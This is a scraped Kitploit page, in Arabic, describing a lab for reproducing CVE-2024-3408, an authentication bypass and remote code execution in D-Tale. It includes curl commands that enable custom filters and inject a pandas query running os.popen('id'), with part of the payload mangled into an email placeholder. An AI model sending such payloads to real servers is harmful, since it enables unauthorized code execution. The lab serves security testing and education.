Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-3408-dtale — مختبر ثغرات لـ CVE-2024-3408 - تجاوز المصادقة في D-Tale و RCE | Kitploit
أدوات/GitHubGitHub/flame-11/cve-2024-3408-dtale
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubflame-11/cve-2024-3408-dtale

CVE-2024-3408-dtale

مختبر ثغرات لـ CVE-2024-3408 - تجاوز المصادقة في D-Tale و RCE

عرض المستودع
منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-3408 - تجاوز المصادقة وتنفيذ الأوامر عن بعد في D-Tale

بيئة مختبر قابلة للتكرار لـ CVE-2024-3408، وهي ثغرة تجاوز المصادقة وتنفيذ الأوامر عن بعد في D-Tale.

الثغرة

إصدارات D-Tale حتى 3.15.1 معرضة للخطر بسبب:

  1. مفتاح سري مثبت مسبقًا (Hardcoded SECRET_KEY) ("Dtale") لتوقيع جلسات Flask - يسمح بتزوير ملفات تعريف الجلسة
  2. تنفيذ الأكواد عبر الفلاتر المخصصة - نقطة النهاية test-filter تستخدم استعلام pandas الذي يمكن استغلاله لتنفيذ أي كود Python

CVSS: 9.8 (حرج)
المتأثر: D-Tale <= 3.15.1

بدء سريع

root@kitploit:~
docker compose up -d --build

سيكون D-Tale متاحًا على http://localhost:40000

التحقق

root@kitploit:~
# Step 1: Enable custom filters
curl -s "http://localhost:40000/dtale/update-settings/1?settings=%7B%22enable_custom_filters%22%3Atrue%7D"
# Expected: {"success":true}

# Step 2: Execute command via pandas query injection
curl -s -G "http://localhost:40000/dtale/test-filter/1" \
  --data-urlencode "[email protected].__import__('os').popen('id').read()"
# Expected: Response contains "uid=" and "gid=" (command output in error message)

التنظيف

root@kitploit:~
docker compose down

المراجع

  • Huntr Report (CVE-2024-3408)
  • Huntr Report (CVE-2025-0655)
  • NVD
  • D-Tale GitHub

إخلاء المسؤولية

هذا المختبر لأغراض تعليمية واختبار أمني مصرح به فقط. لا تستخدمه ضد أنظمة لا تملكها أو ليس لديك إذن باختبارها.

تنزيل الأداة